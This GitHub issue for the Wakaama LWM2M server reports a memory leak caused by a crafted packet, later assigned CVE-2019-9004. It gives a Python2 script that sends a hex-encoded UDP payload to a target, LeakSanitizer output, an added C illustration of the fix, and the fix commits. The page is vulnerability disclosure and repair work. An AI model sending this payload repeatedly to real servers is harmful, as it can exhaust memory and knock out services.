Memory leak while processing crafted packet #425

Closed
cve-reporting opened this issue Feb 18, 2019 · 1 comment · Fixed by #426

Comments

@cve-reporting

Wakaama LWM2M server incorrectly handles incoming packets, leading to a memory leak.
Processing a single crafted packet leads to leaking (wasting) 24 bytes of memory.
This can lead to the LWM2M server stopping after exhausting all available memory.
Depending on server configuration and isolation of services, this can also stop other processes on the same server.

Proposed CVSS 3.0 Score:

On systems with modern memory protection and isolation of services:
5.3 (medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

On systems with lower memory protection and no isolation of services:
7.5 (high) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Reproduction:

  1. Wakaama must be compiled with Leak Sanitizer (or other similar tool) by setting compilation flag:
    C_FLAGS = -fsanitize=address

  2. Run Wakaama server as:
    lwm2mserver -4 -l 55555

  3. Run following Python2 script (running multiple times will show larger leak):


    import sys
    import socket

    WAKAAMA_PAYLOAD = "4402e6e2e2e68167b2726411"
    out_data = WAKAAMA_PAYLOAD.decode('hex')
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM )
    s.sendto(out_data, (sys.argv[1], int(sys.argv[2])))


    Execution of the script:

    python2 wakaama_test.py dst_ip dst_port
    (where: dst_ip and dst_port are IP and port of tested Wakaama server)
    e.g.:
    sudo python wakaama_test.py 192.168.0.101 55555

  4. Close the lwm2mserver to get report from Leak Sanitizer:

    12 bytes received from [....]:....
    44 02 E6 E2 E2 E6 81 67 B2 72 64 11 D......g.rd.
    ^C
    =================================================================
    ==19153==ERROR: LeakSanitizer: detected memory leaks

    Direct leak of 24 byte(s) in 1 object(s) allocated from:
    #0 0x7f4fa293b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42f1df in lwm2m_malloc (/wakaama-master/build_asan/lwm2mserver+0x42f1df)
    #2 0x425ad6 in coap_add_multi_option (/wakaama-master/build_asan/lwm2mserver+0x425ad6)
    #3 0x42910f in coap_parse_message (/wakaama-master/build_asan/lwm2mserver+0x42910f)
    #4 0x412aac in lwm2m_handle_packet (/wakaama-master/build_asan/lwm2mserver+0x412aac)
    #5 0x4088e2 in main (/wakaama-master/build_asan/lwm2mserver+0x4088e2)
    #6 0x7f4fa24f982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

    SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).

sbertin-telular added a commit to sbertin-telular/wakaama that referenced this issue Feb 18, 2019
Option processing can allocate memory. Encountering a bad option was
returning an error without freeing that memory. This adds the necessary
calls to free the memory to fix eclipse-wakaama#425.

Signed-off-by: Scott Bertin <sbertin@telular.com>
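Added example, written for this page and not Wakaama's own code: the fix pattern the commit message describes, freeing the partially built option list on every error path of the option parser. The wire format is a simplified stand-in (not real CoAP), and the `live_allocs` counter is an assumption standing in for what LeakSanitizer reports.

```c
/* Added example, not Wakaama's code: the #425 leak pattern and the fix from the
 * commit message (free the partially built option list on every error path).
 * Wire format is a simplified stand-in, NOT real CoAP: [value len][bytes...]. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef struct multi_option {
    struct multi_option *next;
    uint8_t len;
    uint8_t data[8];
} multi_option_t;

static int live_allocs = 0; /* stands in for LeakSanitizer's allocation count */

void free_multi_option(multi_option_t *list) {
    while (list != NULL) {
        multi_option_t *next = list->next;
        free(list);
        live_allocs--;
        list = next;
    }
}

/* Returns 0 and sets *out on success, -1 (with *out NULL) on a bad option. */
int parse_options(const uint8_t *buf, size_t len, multi_option_t **out) {
    multi_option_t *head = NULL, *tail = NULL;
    size_t i = 0;
    while (i < len) {
        uint8_t olen = buf[i];
        /* bad option: declared length runs past the packet or the 8-byte slot */
        if (olen > 8 || i + 1 + olen > len) goto bad;
        multi_option_t *o = calloc(1, sizeof *o);
        if (o == NULL) goto bad;
        live_allocs++;
        o->len = olen;
        memcpy(o->data, buf + i + 1, olen);
        if (tail != NULL) tail->next = o; else head = o;
        tail = o;
        i += 1 + olen;
    }
    *out = head;
    return 0;
bad:
    free_multi_option(head); /* before the fix this path returned without freeing */
    *out = NULL;
    return -1;
}

int live_allocations(void) { return live_allocs; }
```

Running the parser on a packet whose second option claims more bytes than remain ends with zero live allocations, which is the condition the leak report above showed violated.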
@dnav dnav closed this as completed in #426 Feb 19, 2019
@cve-reporting

For this vulnerability the following ID was assigned: CVE-2019-9004

gerrit-swi pushed a commit to legatoproject/wakaama that referenced this issue Jul 16, 2020
Merge the Wakaama eclipse-wakaama#425 and add unitary test
Fix another leak

Resolves: LE-15018
Relates: LE-14808
Change-Id: I5db3bea45429f66aaacb83425d5915fe0c94331f
Signed-off-by: Frederic DUR <fdur@sierrawireless.com>
gerrit-swi pushed a commit to legatoproject/wakaama that referenced this issue Aug 6, 2020
Merge the Wakaama eclipse-wakaama#425 and add unitary test
Fix another leak

Resolves: LE-15016
Change-Id: Ib1e6cf39aeaa663d4d7e3601135311a0aa48e536
Signed-off-by: Frederic DUR <fdur@sierrawireless.com>
gerrit-swi pushed a commit to legatoproject/wakaama that referenced this issue Feb 24, 2021
Merge the Wakaama eclipse-wakaama#425 and add unitary test
Fix another leak

Relates: LE-14808
Resolves: LE-15890
Change-Id: I19bb39afb0481d36e9f12ac2a86cbaccfd474545
Signed-off-by: Frederic DUR <fdur@sierrawireless.com>
(cherry picked from commit b1f3a8beec3e0cbaddc28a51cdd24097272ac899)